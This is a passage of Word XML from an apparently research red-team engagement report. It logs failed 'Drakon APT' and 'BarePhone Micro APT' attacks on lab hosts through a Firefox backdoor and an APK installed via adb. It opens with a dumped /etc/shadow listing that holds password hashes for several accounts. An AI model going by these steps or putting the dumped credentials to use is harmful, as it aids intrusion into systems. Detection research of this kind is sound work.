    <w:p w14:paraId="598A6913" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>nobody:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEDDC8A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>libuuid:!:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19325D6C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>syslog:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C36B00E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>messagebus:*:17960:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190CEF4A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>landscape:*:17960:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2044BA6F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sshd:*:17960:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B0F1EB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>darpa:$6$xK.VzxdE$iH0y2NIVuELMfyi3A4edvS5GCFgzGkH64wLL0kn.zlVUW8PQkowSMnhiHK8mLX2vIoJPDkAb.rQyd0VKSPiQv1:17960:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3D83B0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ta3:$6$dKwZiNDq7c$ZT/5r3gWSiX1ravToSgvOwZD3Th0FxhAnCB4wd7KOirVP/ucFKlsmG4Vh70ThRvXIO2mZEmF3Etf9IX.pXF7j/:17960:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F1BD13" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ta1:$6$/R0.5o4EB1$E74dZ0Ihgx6Uo3YNWnbOOhVfvKmb6npZf9QJpgj0D9cb3SSm3ulmDJpGbMwNt3z9PIMM.MrLekZdwchioMkOR0:17960:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EF35FB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin:$6$xvFHybfOzUlccoHY$r1iiRXW9m7TE/RrL4GYXECWiEb1vY7hjlyOo1ib8K11ZWtbDxOswfw3YngpdkzCO4ZLSze/mvhQdvUQgRKaK7.:17960:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF69AE1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>user:$6$PyzIwQMUm45$zp5Ywn5B27Jr3ADu6TAbozDRKnSmc6LxCrs8WevCkklm2GwFZIQzO2PHRRlOUzovd1e/Yaq8yHQrQ1gWpnapI1:17960:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA06229" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>iswitcher:$6$LnLdWwNr8VwH1$RhkU2yaVSAGE015CMXOamYKklXm94oLGQIishhkgQ58KD8R5sR6/HX2PZqN1tQWoQGXEjVR0KVnwR7sPtluM5/:17960:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E2901E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>usbmux:*:17961:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BFA4D7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>avahi:*:17961:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A23B30F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>lightdm:*:17961:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56990FF4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>dnsmasq:*:17961:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4905E4BF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>avahi-autoipd:*:17961:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02255CD1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>colord:*:17961:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6660D7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kernoops:*:17961:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689E0AAC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>pulse:*:17961:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120C4EEA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>rtkit:*:17961:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3C2618" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>whoopsie:*:17961:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078E64AD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>speech-dispatcher:!:17961:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB9015C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>hplip:*:17961:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60760F52" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>saned:*:17961:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C36A205" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ntp:*:17961:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F25C81" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>smmsp:!:17961:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD38DAA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>prometheus:*:18009:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EE9392" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B9FEF3A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:44</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A95DD6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L2&gt;quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7981B0E8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6CB022" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        L2        128.55.12.167:54140 --&gt;   128.55.12.167:8105  [HTTP]  Tue May 14 10:21:25 2019        DEAD 271358s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE16CF3" w14:textId="61D1DFB7" w:rsidR="00A351B2" w:rsidRPr="004C28E0" w:rsidRDefault="006C14C7" w:rsidP="004C28E0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        L1        128.55.12.167:54136 --&gt;   128.55.12.167:8105  [HTTP]  Tue May 14</w:t>
      </w:r>
      <w:r w:rsidR="004C28E0">
        <w:t xml:space="preserve"> 10:18:22 2019        DEAD 360s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0C15D3" w14:textId="2E6E35A3" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc12600055"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>11:45 -- TA1 THEIA -- Firefox Drakon APT (Failed)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p w14:paraId="0DAE3C90" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Intended to run the Drakon APT via the Firefox backdoor but found we were unable to browse to any websites using Firefox.  BBN and THEIA planned a solution or workaround.  We reran the attack later in the week.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70560BFE" w14:textId="0B1209A1" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_lbf5y6lewy21" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="106" w:name="_Toc12600056"/>
      <w:bookmarkEnd w:id="105"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p w14:paraId="30170B81" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Ta1-theia (No host targeted as couldn’t get any to browse to a website with Firefox)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2133FE" w14:textId="2741C70E" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_kmgy2wuyyw09" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="108" w:name="_Toc12600057"/>
      <w:bookmarkEnd w:id="107"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
    </w:p>
    <w:p w14:paraId="37D49933"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Firefox backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7206122A" w14:textId="711247A6" w:rsidR="00A351B2"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Drakon APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E20340" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="_Toc12600058"/>
      <w:r>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p w14:paraId="20A39B7F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:09</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F912A88" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">kududyn@kududyn-ProLiant-SL170s-G6:~/tmp$ scp barephone-instr.apk user@128.55.12.54:.                                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F19839D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">user@128.55.12.54's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DB0091" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">barephone-instr.apk                                                                                                                                  100%  127KB 127.5KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB18F0B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">kududyn@kududyn-ProLiant-SL170s-G6:~/tmp$ ssh user@128.55.12.54                                                                                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C98711" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">user@128.55.12.54's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484F6A92" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B84340" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CF8AA6B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAE9F3E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[user@ta1-clearscope-translate ~]$ adb devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681FD53A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>List of devices attached</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28440BC1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>HT79S1A06684    device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5583C45A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B109759" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068B0555" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:~/tmp$ scp barephone-instr.apk user@128.55.12.54:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5832BF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">user@128.55.12.54's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389F8AF3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Permission denied, please try again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA263A4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">user@128.55.12.54's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD582D6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">barephone-instr.apk                                                                                                                                  100%  128KB 128.4KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D093A0A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:~/tmp$ ssh user@128.55.12.54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2604537F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">user@128.55.12.54's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F03FC04" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Permission denied, please try again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E7E6DE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">user@128.55.12.54's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29909C14" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC08568" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13CAADF7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[user@ta1-clearscope-translate ~]$ adb devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6180A5A2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>List of devices attached</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5F2DF1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>HT79S1A06684    device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21723438" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="354A0EA1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:44</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751FF87F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[user@ta1-clearscope-translate ~]$ adb install barephone-instr.apk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668D2150" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F43D998" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Tried to run the test but install took too long and ran out of time.  Contacted BBN to check it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FF8CC2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>(6:06:29 PM) tchristo@tc.bbn.com: The ch04 phone is stuck in 'landscape' on the display and is completely unresponsive to touch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296BEC83" w14:textId="4B805D1A" w:rsidR="006C14C7" w:rsidRPr="004C28E0" w:rsidRDefault="006C14C7" w:rsidP="004C28E0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006C14C7">
        <w:t>(6:06:54 PM) tchristo@tc.bbn.com: I pressed the power and volume keys a few times each and got no feedback from the device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF3D0E3" w14:textId="4EA4751E" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_ks466g91l5xn" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="111" w:name="_Toc12600059"/>
      <w:bookmarkEnd w:id="110"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>16:09 -- TA1 ClearScope 1 -- BarePhone Micro APT (Failed)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p w14:paraId="3DA18994" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Intended to run the Barephone app to launch Micro APT; however, the APK installation did not finish in over an hour.  We contacted BBN to take a look at the phones.  They saw that the phones were still publishing, but it was obvious to us that something was wrong.  We were unable to run our attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7927C901" w14:textId="4CE3F84C" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
